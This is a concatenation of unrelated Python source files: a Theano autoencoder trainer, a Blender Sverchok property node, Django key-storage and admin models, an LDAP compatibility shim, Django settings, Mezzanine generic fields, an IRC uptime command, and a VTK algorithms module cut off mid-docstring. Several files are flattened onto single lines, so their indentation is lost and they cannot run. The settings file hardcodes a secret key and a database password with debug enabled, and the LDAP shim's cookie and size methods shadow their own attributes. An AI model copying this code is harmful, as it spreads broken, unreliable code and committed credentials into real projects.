nonlinearity=lasagne.nonlinearities.linear, # linear ) return l_out def net_training(iter_funcs, data): num_batches_train = data['num_train_data']//batch_size # print("num_batches_train:{}".format(num_batches_train)) num_batches_valid = data['num_valid_data']//batch_size num_batches_test = data['num_test_data']//batch_size for epoch in itertools.count(1): batch_train_losses = [] batch_valid_losses = [] batch_test_losses = [] # Training for i_batch in range(num_batches_train): batch_train_loss = iter_funcs['train'](i_batch) batch_train_losses.append(batch_train_loss) # print("batch_train_losses:{}".format(batch_train_losses)) train_loss_mean = np.mean(batch_train_losses) # Validation for i_batch in range(num_batches_valid): batch_valid_loss = iter_funcs['valid'](i_batch) # print("i_batch:{}".format(i_batch)) batch_valid_losses.append(batch_valid_loss) # print("batch_valid_losses:{}".format(batch_valid_losses)) valid_loss_mean = np.mean(batch_valid_losses) # Testing for i_batch in range(num_batches_test): batch_test_loss, accuracy = iter_funcs['test'](i_batch) batch_test_losses.append(batch_test_loss) # print("accuracy:{}".format(accuracy)) test_loss_mean = np.mean(batch_test_losses) # print(len(iter_funcs['network_output'](9)[0])) result = dict( epoch = epoch, train_loss = train_loss_mean, valid_loss = valid_loss_mean, test_loss = test_loss_mean, network_output = iter_funcs['network_output'](chosen_batch)[0], network_input = iter_funcs['network_input'](chosen_batch)[0], target = iter_funcs['target'](chosen_batch)[0] ) return result def batch_iterations(data, output_layer): batch_index = T.iscalar('batch_index') X_batch = T.matrix('x') y_batch = T.matrix('y') batch_slice = slice(batch_index * batch_size, (batch_index + 1) * batch_size) output = get_output(output_layer, X_batch, deterministic=False) loss_train = squared_error(output, y_batch).mean() # change to mean square error output_test = get_output(output_layer, X_batch, deterministic=True) loss_test = squared_error(output_test, y_batch).mean() predicted_out = theano.sparse.basic.sub(output_test, T.zeros_like(y_batch)) # print(T.classification_report(output_test, y_batch)) # Classification on each digit accuracy = T.mean(T.eq(output_test, y_batch), dtype=theano.config.floatX) all_params = get_all_params(output_layer) updates = lasagne.updates.nesterov_momentum( loss_train, all_params, learning_rate, momentum) iter_train = theano.function( 
[batch_index], loss_train, updates=updates, givens={ X_batch: data['X_train'][batch_slice], y_batch: data['y_train'][batch_slice], }, ) iter_valid = theano.function( [batch_index], [loss_test, accuracy], givens={ X_batch: data['X_valid'][batch_slice], y_batch: data['y_valid'][batch_slice], }, ) iter_test = theano.function( [batch_index], [loss_test, accuracy], givens={ X_batch: data['X_test'][batch_slice], y_batch: data['y_test'][batch_slice], }, ) network_input = theano.function( [batch_index], data['X_valid'][batch_slice], ) network_output = theano.function( [batch_index], predicted_out, givens={ X_batch: data['X_valid'][batch_slice], y_batch: data['y_valid'][batch_slice], }, ) target = theano.function( [batch_index], data['y_valid'][batch_slice], ) return dict( train=iter_train, valid=iter_valid, test=iter_test, network_output = network_output, network_input = network_input, target = target, ) def save_activation(activation_list): binary_list = [] for each_value in activation_list: if each_value > activation_threshold: binary_list.append(1) else: binary_list.append(0) return binary_list def classification_main(): epoch_no = [] train_loss = [] valid_loss = [] test_loss = [] valid_accuracy = [] print("--------------------------------------------") print("Loading data...") data = lrd.load_real_data_main() print("--------------------------------------------") print("Building model...") output_layer = autoencoder(input_d=data['input_d'],output_d=data['output_d']) print("--------------------------------------------") print("Training model...") iter_funcs = batch_iterations(data, output_layer) for each_epoch in range(max_epochs): result = net_training(iter_funcs, data) epoch_no.append(each_epoch) network_output = result['network_output'] network_input = result['network_input'] target = result['target'] binary_net_pre = save_activation(network_output) binary_net_tgt = save_activation(target) accuracy = accuracy_score(binary_net_tgt, binary_net_pre) print("Epoch {} of {} Accuracy:{:.2f}".format(each_epoch+1, max_epochs,accuracy)) print("train_loss:{:.2f}%".format(result['train_loss']*100)) print("valid_loss:{:.2f}%".format(result['valid_loss']*100)) print("test_loss:{:.2f}%".format(result['test_loss']*100)) train_loss.append(result['train_loss']) valid_loss.append(result['valid_loss']) test_loss.append(result['test_loss']) # Plot activation figure for network input, network output and target if each_epoch==max_epochs-1: # Binary matrix for accuracy and evaluation print(classification_report(binary_net_tgt, binary_net_pre)) plt.subplot(3, 1, 1) plt.plot(network_output, 'b-') plt.ylabel('Network Output') plt.grid() plt.subplot(3, 1, 2) plt.plot(target, 'r-', label='Wash Machine') plt.legend(fontsize = 'x-small') plt.ylabel('Target') plt.grid() plt.subplot(3, 1, 3) plt.plot(network_input, 'y-') plt.ylabel('Network Input') plt.xlabel('Time') plt.grid() plt.show() plt.close() plt.plot(epoch_no, train_loss) plt.plot(epoch_no, valid_loss) plt.plot(epoch_no, test_loss) plt.ylabel('Error') plt.xlabel('No_epoch') plt.legend(['train_loss', 'valid_loss', 'test_loss'], loc='upper right') plt.show() if __name__ == '__main__': classification_main()
# ##### BEGIN GPL LICENSE BLOCK ##### # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software Foundation, # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. # # ##### END GPL LICENSE BLOCK ##### import ast import traceback import bpy from bpy.props import StringProperty, BoolProperty, IntProperty, FloatProperty import mathutils from mathutils import Matrix, Vector, Euler, Quaternion, Color from sverchok.node_tree import SverchCustomTreeNode from sverchok.data_structure import Matrix_generate, updateNode, node_id def parse_to_path(p): ''' Create a path and can be looked up easily. Return an array of tuples with op type and value ops are: name - global name to use attr - attribute to get using getattr(obj,attr) key - key for accesing via obj[key] ''' if isinstance(p, ast.Attribute): return parse_to_path(p.value)+[("attr", p.attr)] elif isinstance(p, ast.Subscript): if isinstance(p.slice.value, ast.Num): return parse_to_path(p.value) + [("key", p.slice.value.n)] elif isinstance(p.slice.value, ast.Str): return parse_to_path(p.value) + [("key", p.slice.value.s)] elif isinstance(p, ast.Name): return [("name", p.id)] else: raise NameError def get_object(path): ''' access the object speciefed from a path generated by parse_to_path will fail if path is invalid ''' curr_object = globals()[path[0][1]] for t, value in path[1:]: if t == "attr": curr_object = getattr(curr_object, value) elif t == "key": curr_object = curr_object[value] return curr_object def apply_alias(eval_str): ''' apply standard aliases will raise error if it isn't an bpy path ''' if not eval_str.startswith("bpy."): for alias, expanded in aliases.items(): if eval_str.startswith(alias): eval_str = eval_str.replace(alias, expanded, 1) break if not eval_str.startswith("bpy."): raise NameError return eval_str def wrap_output_data(tvar): ''' create valid sverchok socket data from an object from ek node ''' if isinstance(tvar, (Vector, Color)): data = [[tvar[:]]] elif isinstance(tvar, Matrix): data = [[r[:] for r in tvar[:]]] elif isinstance(tvar, (Euler, Quaternion)): tvar = tvar.to_matrix().to_4x4() data = [[r[:] for r in tvar[:]]] elif isinstance(tvar, list): data = [tvar] elif isinstance(tvar, (int, float)): data = [[tvar]] else: data = tvar return data def assign_data(obj, data): ''' assigns data to the object ''' if isinstance(obj, (int, float)): # doesn't work obj = data[0][0] elif isinstance(obj, (Vector, Color)): obj[:] = data[0][0] elif isinstance(obj, (Matrix, Euler, Quaternion)): mats = Matrix_generate(data) mat = mats[0] if isinstance(obj, Euler): eul = mat.to_euler(obj.order) obj[:] = eul elif isinstance(obj, Quaternion): quat = mat.to_quaternion() obj[:] = quat else: #isinstance(obj, Matrix) obj[:] = mat else: # super optimistic guess obj[:] = type(obj)(data[0][0]) aliases = { "c": "bpy.context", "C" : "bpy.context", "scene": "bpy.context.scene", "data": "bpy.data", "D": "bpy.data", "objs": "bpy.data.objects", "mats": "bpy.data.materials", 
"meshes": "bpy.data.meshes", "texts": "bpy.data.texts" } types = { int: "StringsSocket", float: "StringsSocket", str: "StringsSocket", # I WANT A PROPER TEXT SOCKET!!! mathutils.Vector: "VerticesSocket", mathutils.Color: "VerticesSocket", mathutils.Matrix: "MatrixSocket", mathutils.Euler: "MatrixSocket", mathutils.Quaternion: "MatrixSocket", } class SvGetPropNode(bpy.types.Node, SverchCustomTreeNode): ''' Get property ''' bl_idname = 'SvGetPropNode' bl_label = 'Get property' bl_icon = 'FORCE_VORTEX' bad_prop = BoolProperty(default=False) def verify_prop(self, context): try: obj = self.obj except: traceback.print_exc() self.bad_prop = True return self.bad_prop = False s_type = types.get(type(obj)) outputs = self.outputs if s_type and outputs: outputs[0].replace_socket(s_type) elif s_type: outputs.new(s_type, "Data") prop_name = StringProperty(name='', update=verify_prop) @property def obj(self): eval_str = apply_alias(self.prop_name) ast_path = ast.parse(eval_str) path = parse_to_path(ast_path.body[0].value) return get_object(path) def draw_buttons(self, context, layout): layout.alert = self.bad_prop layout.prop(self, "prop_name", text="") def process(self): self.outputs[0].sv_set(wrap_output_data(self.obj)) class SvSetPropNode(bpy.types.Node, SverchCustomTreeNode): ''' Set property ''' bl_idname = 'SvSetPropNode' bl_label = 'Set property' bl_icon = 'FORCE_VORTEX' ok_prop = BoolProperty(default=False) bad_prop = BoolProperty(default=False) @property def obj(self): eval_str = apply_alias(self.prop_name) ast_path = ast.parse(eval_str) path = parse_to_path(ast_path.body[0].value) return get_object(path) def verify_prop(self, context): try: obj = self.obj except: traceback.print_exc() self.bad_prop = True return self.bad_prop = False s_type = types.get(type(obj)) inputs = self.inputs p_name = {float: "float_prop", int: "int_prop"}.get(type(obj),"") if inputs and s_type: socket = inputs[0].replace_socket(s_type) socket.prop_name = p_name elif s_type: inputs.new(s_type, "Data").prop_name = p_name if s_type == "VerticesSocket": inputs[0].use_prop = True prop_name = StringProperty(name='', update=verify_prop) float_prop = FloatProperty(update=updateNode, name="x") int_prop = IntProperty(update=updateNode, name="x") def draw_buttons(self, context, layout): layout.alert = self.bad_prop layout.prop(self, "prop_name", text="") def process(self): data = self.inputs[0].sv_get() eval_str = apply_alias(self.prop_name) ast_path = ast.parse(eval_str) path = parse_to_path(ast_path.body[0].value) obj = get_object(path) if isinstance(obj, (int, float)): obj = get_object(path[:-1]) p_type, value = path[-1] if p_type == "attr": setattr(obj, value, data[0][0]) else: obj[value] = data[0][0] else: assign_data(obj, data) def register(): bpy.utils.register_class(SvSetPropNode) bpy.utils.register_class(SvGetPropNode) def unregister(): bpy.utils.unregister_class(SvSetPropNode) bpy.utils.unregister_class(SvGetPropNode)
import base64

from django.db import models
from django.utils.crypto import get_random_string

from cryptography.fernet import Fernet


class BeamApiKey(models.Model):
    user = models.ForeignKey('account.User')
    beam = models.CharField(max_length=255)
    akey = models.CharField(max_length=255)
    generated = models.DateTimeField(auto_now=True)

    class Meta:
        unique_together = (('user', 'akey'),)
        verbose_name = 'Beam API Key'

    def __unicode__(self):
        return self.beam

    @staticmethod
    def get_or_create(user, beam):
        try:
            return BeamApiKey.objects.get(user=user, beam=beam)
        except BeamApiKey.DoesNotExist:
            bkey = BeamApiKey(user=user, beam=beam, akey=BeamApiKey.gen_key())
            bkey.save()
            return bkey

    @staticmethod
    def gen_key():
        chars = 'abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*(-_=+)'
        akey = get_random_string(50, chars)
        akey = base64.urlsafe_b64encode(akey)
        return akey

    def regen(self):
        self.akey = BeamApiKey.gen_key()
        self.save()


class EKey(models.Model):
    user = models.ForeignKey('account.User')
    beam = models.CharField(max_length=255)
    ekey = models.CharField(max_length=255, blank=True, null=True)
    created = models.DateTimeField(auto_now_add=True)

    class Meta:
        unique_together = (('user', 'ekey'),)
        verbose_name = 'Encryption Key'
        get_latest_by = "created"

    def __unicode__(self):
        return self.beam

    @staticmethod
    def create(user, beam):
        key = Fernet.generate_key()
        ekey = EKey(user=user, beam=beam, ekey=key)
        ekey.save()
        return ekey
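# --- Sketch: what the stored Fernet key is for --------------------------------
# EKey.create() stores the output of Fernet.generate_key() per (user, beam).
# A small, standalone illustration of such a key being used for symmetric
# encryption; the payload is a placeholder.
def _fernet_roundtrip_sketch():
    key = Fernet.generate_key()          # same call used in EKey.create()
    f = Fernet(key)
    token = f.encrypt(b'beam payload')
    assert f.decrypt(token) == b'beam payload'
# ------------------------------------------------------------------------------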
from django.db import models
from django.contrib import admin

from club.models.season import current_season


class CategoryAdmin(admin.ModelAdmin):
    list_display = ('name', 'discipline', 'season', 'order')
    fieldsets = ((None, {'fields': ('name', 'discipline', 'season', 'prerequisite',
                                    'target_public', 'rhythm', 'objective', 'order')}),)
    list_filter = ('discipline', 'season')


class Category(models.Model):
    name = models.CharField(max_length=100)
    discipline = models.ForeignKey('Discipline', on_delete=models.CASCADE)
    season = models.ForeignKey('Season', on_delete=models.CASCADE)
    prerequisite = models.CharField(max_length=200)
    target_public = models.CharField(max_length=100)
    objective = models.TextField()
    rhythm = models.CharField(max_length=100, blank=True, null=True)
    order = models.IntegerField(blank=True, null=True)

    def __str__(self):
        return self.name


def find_current_categories(discipline):
    season = current_season()
    return Category.objects.filter(season=season, discipline=discipline).order_by('order')
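# --- Wiring sketch (hedged) ----------------------------------------------------
# Hypothetical registration of the admin class defined above; this normally
# lives in the app's admin.py rather than the models module and is not part of
# the file itself.
def _register_category_admin():
    admin.site.register(Category, CategoryAdmin)
# --------------------------------------------------------------------------------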
#
# This file is part of Python-AD. Python-AD is free software that is made
# available under the MIT license. Consult the file "LICENSE" that is
# distributed together with this file for the exact licensing terms.
#
# Python-AD is copyright (c) 2007-2009 by the Python-AD authors. See the
# file "AUTHORS" for a complete overview.

import ldap
import ldap.controls
import ldap.dn
from distutils import version

# ldap.str2dn has been removed in python-ldap >= 2.3.6. We now need to use
# the version in ldap.dn.
try:
    str2dn = ldap.dn.str2dn
except AttributeError:
    str2dn = ldap.str2dn


def disable_reverse_dns():
    # Possibly add in a Kerberos minimum version check as well...
    return hasattr(ldap, 'OPT_X_SASL_NOCANON')


if version.StrictVersion('2.4.0') <= version.StrictVersion(ldap.__version__):
    LDAP_CONTROL_PAGED_RESULTS = ldap.CONTROL_PAGEDRESULTS
else:
    LDAP_CONTROL_PAGED_RESULTS = ldap.LDAP_CONTROL_PAGE_OID


class SimplePagedResultsControl(ldap.controls.SimplePagedResultsControl):
    """
    Python LDAP 2.4 and later breaks the API. This is an abstraction class
    so that we can handle either.

    http://planet.ergo-project.org/blog/jmeeuwen/2011/04/11/python-ldap-module-24-changes
    """

    def __init__(self, page_size=0, cookie=''):
        if version.StrictVersion('2.4.0') <= version.StrictVersion(ldap.__version__):
            ldap.controls.SimplePagedResultsControl.__init__(
                self, size=page_size, cookie=cookie)
        else:
            # Legacy (< 2.4) signature: (controlType, criticality, controlValue),
            # where controlValue is a (size, cookie) tuple.
            ldap.controls.SimplePagedResultsControl.__init__(
                self, LDAP_CONTROL_PAGED_RESULTS, True, (page_size, cookie))

    def cookie(self):
        if version.StrictVersion('2.4.0') <= version.StrictVersion(ldap.__version__):
            return self.cookie
        else:
            return self.controlValue[1]

    def size(self):
        if version.StrictVersion('2.4.0') <= version.StrictVersion(ldap.__version__):
            return self.size
        else:
            return self.controlValue[0]
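# --- Sketch: the paged-search loop this wrapper abstracts ----------------------
# A hedged illustration using the python-ldap >= 2.4 attribute API directly; the
# server URI, bind credentials, base DN and filter below are placeholders.
def _paged_search_sketch(page_size=500):
    import ldap
    from ldap.controls import SimplePagedResultsControl as PagedControl

    conn = ldap.initialize('ldap://dc.example.com')
    conn.simple_bind_s('user@example.com', 'secret')
    ctrl = PagedControl(criticality=True, size=page_size, cookie='')
    entries = []
    while True:
        msgid = conn.search_ext('dc=example,dc=com', ldap.SCOPE_SUBTREE,
                                '(objectClass=user)', serverctrls=[ctrl])
        rtype, rdata, rmsgid, serverctrls = conn.result3(msgid)
        entries.extend(rdata)
        # Continue from the cookie returned in the paged-results response.
        resp = [c for c in serverctrls
                if c.controlType == LDAP_CONTROL_PAGED_RESULTS]
        if not resp or not resp[0].cookie:
            break
        ctrl.cookie = resp[0].cookie
    return entries
# --------------------------------------------------------------------------------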
""" Django settings for freelance project. Generated by 'django-admin startproject' using Django 1.8.2. For more information on this file, see https://docs.djangoproject.com/en/1.8/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.8/ref/settings/ """ # Build paths inside the project like this: os.path.join(BASE_DIR, ...) import os BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = '4dxkq6oc*k+g=imdt_w-$d0!epc2lw%_-l6otq=u42kydg446$' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = ( 'flat', 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'clients', 'invoices', 'items', 'crispy_forms', ) MIDDLEWARE_CLASSES = ( 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.auth.middleware.SessionAuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', 'django.middleware.security.SecurityMiddleware', ) ROOT_URLCONF = 'freelance.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [ 'templates', ], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] CRISPY_TEMPLATE_PACK = 'bootstrap3' WSGI_APPLICATION = 'freelance.wsgi.application' # Database # https://docs.djangoproject.com/en/1.8/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.mysql', 'NAME': 'freelance', 'USER': 'freelanceadmin', 'PASSWORD': 'FREE123', 'HOST': 'localhost', } } # Internationalization # https://docs.djangoproject.com/en/1.8/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.8/howto/static-files/ STATIC_URL = '/static/'
from copy import copy from django.conf import settings from django.contrib.contenttypes.generic import GenericRelation from django.core.exceptions import ImproperlyConfigured from django.db.models import get_model, IntegerField, CharField, FloatField from django.db.models.signals import post_save, post_delete class BaseGenericRelation(GenericRelation): """ Extends ``GenericRelation`` to: - Add a consistent default value for ``object_id_field`` and check for a ``related_model`` attribute which can be defined on subclasses as a default for the ``to`` argument. - Add one or more custom fields to the model that the relation field is applied to, and then call a ``related_items_changed`` method each time related items are saved or deleted, so that a calculated value can be stored against the custom fields since aggregates aren't available for GenericRelation instances. """ # Mapping of field names to model fields that will be added. fields = {} def __init__(self, *args, **kwargs): """ Set up some defaults and check for a ``related_model`` attribute for the ``to`` argument. """ self.frozen_by_south = kwargs.pop("frozen_by_south", False) kwargs.setdefault("object_id_field", "object_pk") to = getattr(self, "related_model", None) if to: kwargs.setdefault("to", to) super(BaseGenericRelation, self).__init__(*args, **kwargs) def db_type(self, connection): """ South expects this to return a string for initial migrations against MySQL, to check for text or geometery columns. These generic fields are neither of those, but returning an empty string here at least allows migrations to run successfully. See http://south.aeracode.org/ticket/1204 """ if self.frozen_by_south: return "" return None def contribute_to_class(self, cls, name): """ Add each of the names and fields in the ``fields`` attribute to the model the relationship field is applied to, and set up the related item save and delete signals for calling ``related_items_changed``. """ for field in cls._meta.many_to_many: if isinstance(field, self.__class__): e = "Multiple %s fields are not supported (%s.%s, %s.%s)" % ( self.__class__.__name__, cls.__name__, cls.__name__, name, field.name) raise ImproperlyConfigured(e) self.related_field_name = name super(BaseGenericRelation, self).contribute_to_class(cls, name) # Not applicable to abstract classes, and in fact will break. if not cls._meta.abstract and not self.frozen_by_south: for (name_string, field) in self.fields.items(): if "%s" in name_string: name_string = name_string % name if not field.verbose_name: field.verbose_name = self.verbose_name cls.add_to_class(name_string, copy(field)) # Add a getter function to the model we can use to retrieve # the field/manager by name. getter_name = "get_%s_name" % self.__class__.__name__.lower() cls.add_to_class(getter_name, lambda self: name) # For some unknown reason the signal won't be triggered # if given a sender arg, particularly when running # Cartridge with the field RichTextPage.keywords - so # instead of specifying self.rel.to as the sender, we # check for it inside the signal itself. post_save.connect(self._related_items_changed) post_delete.connect(self._related_items_changed) def _related_items_changed(self, **kwargs): """ Ensure that the given related item is actually for the model this field applies to, and pass the instance to the real ``related_items_changed`` handler. """ # Manually check that the instance matches the relation, # since we don't specify a sender for the signal. 
try: to = self.rel.to if isinstance(to, basestring): to = get_model(*to.split(".", 1)) if not isinstance(kwargs["instance"], to): raise TypeError except (TypeError, ValueError): return for_model = kwargs["instance"].content_type.model_class() if issubclass(for_model, self.model): instance_id = kwargs["instance"].object_pk try: instance = for_model.objects.get(id=instance_id) except self.model.DoesNotExist: # Instance itself was deleted - signals are irrelevant. return if hasattr(instance, "get_content_model"): instance = instance.get_content_model() related_manager = getattr(instance, self.related_field_name) self.related_items_changed(instance, related_manager) def related_items_changed(self, instance, related_manager): """ Can be implemented by subclasses - called whenever the state of related items change, eg they're saved or deleted. The instance for this field and the related manager for the field are passed as arguments. """ pass class CommentsField(BaseGenericRelation): """ Stores the number of comments against the ``COMMENTS_FIELD_NAME_count`` field when a comment is saved or deleted. """ related_model = "generic.ThreadedComment" fields = {"%s_count": IntegerField(editable=False, default=0)} def related_items_changed(self, instance, related_manager): """ Stores the number of comments. A custom ``count_filter`` queryset gets checked for, allowing managers to implement custom count logic. """ try: count = related_manager.count_queryset() except AttributeError: count = related_manager.count() count_field_name = self.fields.keys()[0] % self.related_field_name setattr(instance, count_field_name, count) instance.save() class KeywordsField(BaseGenericRelation): """ Stores the keywords as a single string into the ``KEYWORDS_FIELD_NAME_string`` field for convenient access when searching. """ related_model = "generic.AssignedKeyword" fields = {"%s_string": CharField(editable=False, blank=True, max_length=500)} def __init__(self, *args, **kwargs): """ Mark the field as editable so that it can be specified in admin class fieldsets and pass validation, and also so that it shows up in the admin form. """ super(KeywordsField, self).__init__(*args, **kwargs) self.editable = True def formfield(self, **kwargs): """ Provide the custom form widget for the admin, since there isn't a form field mapped to ``GenericRelation`` model fields. """ from mezzanine.generic.forms import KeywordsWidget kwargs["widget"] = KeywordsWidget return super(KeywordsField, self).formfield(**kwargs) def save_form_data(self, instance, data): """ The ``KeywordsWidget`` field will return data as a string of comma separated IDs for the ``Keyword`` model - convert these into actual ``AssignedKeyword`` instances. Also delete ``Keyword`` instances if their last related ``AssignedKeyword`` instance is being removed. """ from mezzanine.generic.models import AssignedKeyword, Keyword related_manager = getattr(instance, self.name) # Get a list of Keyword IDs being removed. old_ids = [str(a.keyword_id) for a in related_manager.all()] new_ids = data.split(",") removed_ids = set(old_ids) - set(new_ids) # Remove current AssignedKeyword instances. related_manager.all().delete() # Convert the data into AssignedKeyword instances. if data: data = [AssignedKeyword(keyword_id=i) for i in new_ids] # Remove Keyword instances than no longer have a # related AssignedKeyword instance. 
existing = AssignedKeyword.objects.filter(keyword__id__in=removed_ids) existing_ids = set([str(a.keyword_id) for a in existing]) unused_ids = removed_ids - existing_ids Keyword.objects.filter(id__in=unused_ids).delete() super(KeywordsField, self).save_form_data(instance, data) def contribute_to_class(self, cls, name): """ Swap out any reference to ``KeywordsField`` with the ``KEYWORDS_FIELD_string`` field in ``search_fields``. """ super(KeywordsField, self).contribute_to_class(cls, name) string_field_name = self.fields.keys()[0] % self.related_field_name if hasattr(cls, "search_fields") and name in cls.search_fields: try: weight = cls.search_fields[name] except TypeError: # search_fields is a sequence. index = cls.search_fields.index(name) search_fields_type = type(cls.search_fields) cls.search_fields = list(cls.search_fields) cls.search_fields[index] = string_field_name cls.search_fields = search_fields_type(cls.search_fields) else: del cls.search_fields[name] cls.search_fields[string_field_name] = weight def related_items_changed(self, instance, related_manager): """ Stores the keywords as a single string for searching. """ assigned = related_manager.select_related("keyword") keywords = " ".join([unicode(a.keyword) for a in assigned]) string_field_name = self.fields.keys()[0] % self.related_field_name if getattr(instance, string_field_name) != keywords: setattr(instance, string_field_name, keywords) instance.save() class RatingField(BaseGenericRelation): """ Stores the rating count and average against the ``RATING_FIELD_NAME_count`` and ``RATING_FIELD_NAME_average`` fields when a rating is saved or deleted. """ related_model = "generic.Rating" fields = {"%s_count": IntegerField(default=0, editable=False), "%s_sum": IntegerField(default=0, editable=False), "%s_average": FloatField(default=0, editable=False)} def related_items_changed(self, instance, related_manager): """ Calculates and saves the average rating. """ ratings = [r.value for r in related_manager.all()] count = len(ratings) _sum = sum(ratings) average = _sum / float(count) if count > 0 else 0 setattr(instance, "%s_count" % self.related_field_name, count) setattr(instance, "%s_sum" % self.related_field_name, _sum) setattr(instance, "%s_average" % self.related_field_name, average) instance.save() # South requires custom fields to be given "rules". # See http://south.aeracode.org/docs/customfields.html if "south" in settings.INSTALLED_APPS: try: from south.modelsinspector import add_introspection_rules add_introspection_rules(rules=[((BaseGenericRelation,), [], {"frozen_by_south": [True, {"is_value": True}]})], patterns=["mezzanine\.generic\.fields\."]) except ImportError: pass
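# --- Usage sketch (hedged) -------------------------------------------------------
# How fields like the above are attached to a content model in practice. The model
# below is hypothetical (and abstract, so it creates no table); each field injects
# its denormalised companion columns such as "<name>_count" or "<name>_average"
# through contribute_to_class, as described in the docstrings above.
from django.db import models


class ExampleRateableContent(models.Model):
    title = models.CharField(max_length=200)
    comments = CommentsField()
    keywords = KeywordsField()
    rating = RatingField()

    class Meta:
        abstract = True  # illustration only; keep it out of real migrations
# ----------------------------------------------------------------------------------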
# Copyright (C) 2013-2015 Samuel Damashek, Peter Foley, James Forcier, Srijay Kasturi,
# Reed Koser, Christopher Reffett, and Fox Wilson
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.

from time import time
from datetime import timedelta

from ..helpers.command import Command


@Command('uptime', ['handler'])
def cmd(send, _, args):
    """Shows the bot's uptime.

    Syntax: {command}

    """
    curr = time()
    uptime = args['handler'].uptime
    starttime = curr - uptime['start']
    reloaded = curr - uptime['reloaded']
    send("Time since start: %s" % timedelta(seconds=starttime))
    send("Time since reload: %s" % timedelta(seconds=reloaded))
""" This module provides a number of algorithms that can be used with the dataset classes defined in the dataset_adapter module. See the documentation of the dataset_adapter for some examples. These algorithms work in serial and in parallel as long as the data is partitioned according to VTK data parallel execution guidelines. For details, see the documentation of individual algorithms. """ from __future__ import absolute_import import sys try: import numpy except ImportError: raise RuntimeError("This module depends on the numpy module. Please make\ sure that it is installed properly.") from . import dataset_adapter as dsa from . import internal_algorithms as algs import itertools try: from vtk.vtkParallelCore import vtkMultiProcessController from vtk.vtkParallelMPI4Py import vtkMPI4PyCommunicator except ImportError: vtkMultiProcessController = None vtkMPI4PyCommunicator = None if sys.hexversion < 0x03000000: izip = itertools.izip else: izip = zip def _apply_func2(func, array, args): """Apply a function to each member of a VTKCompositeDataArray. Returns a list of arrays. Note that this function is mainly for internal use by this module.""" if array is dsa.NoneArray: return [] res = [] for a in array.Arrays: if a is dsa.NoneArray: res.append(dsa.NoneArray) else: res.append(func(a, *args)) return res def apply_ufunc(func, array, args=()): """Apply a function to each member of a VTKCompositeDataArray. VTKArray and numpy arrays are also supported.""" if array is dsa.NoneArray: return dsa.NoneArray elif type(array) == dsa.VTKCompositeDataArray: return dsa.VTKCompositeDataArray(_apply_func2(func, array, args), dataset = array.DataSet) else: return func(array) def _make_ufunc(ufunc): """ Given a ufunc, creates a closure that applies it to each member of a VTKCompositeDataArray. Note that this function is mainly for internal use by this module.""" def new_ufunc(array): return apply_ufunc(ufunc, array, ()) return new_ufunc def apply_dfunc(dfunc, array1, val2): """Apply a two argument function to each member of a VTKCompositeDataArray and another argument The second argument can be a VTKCompositeDataArray, in which case a one-to-one match between arrays is assumed. Otherwise, the function is applied to the composite array with the second argument repeated. VTKArray and numpy arrays are also supported.""" if type(array1) == dsa.VTKCompositeDataArray and type(val2) == dsa.VTKCompositeDataArray: res = [] for a1, a2 in izip(array1.Arrays, val2.Arrays): if a1 is dsa.NoneArray or a2 is dsa.NoneArray: res.append(dsa.NoneArray) else: l = dsa.reshape_append_ones(a1, a2) res.append(dfunc(l[0], l[1])) return dsa.VTKCompositeDataArray(res, dataset = array1.DataSet) elif type(array1) == dsa.VTKCompositeDataArray: res = [] for a in array1.Arrays : if a is dsa.NoneArray: res.append(dsa.NoneArray) else: l = dsa.reshape_append_ones(a, val2) res.append(dfunc(l[0], l[1])) return dsa.VTKCompositeDataArray(res, dataset = array1.DataSet) elif array1 is dsa.NoneArray: return dsa.NoneArray else: l = dsa.reshape_append_ones(array1, val2) return dfunc(l[0], l[1]) def _make_dfunc(dfunc): """ Given a function that requires two arguments, creates a closure that applies it to each member of a VTKCompositeDataArray. 
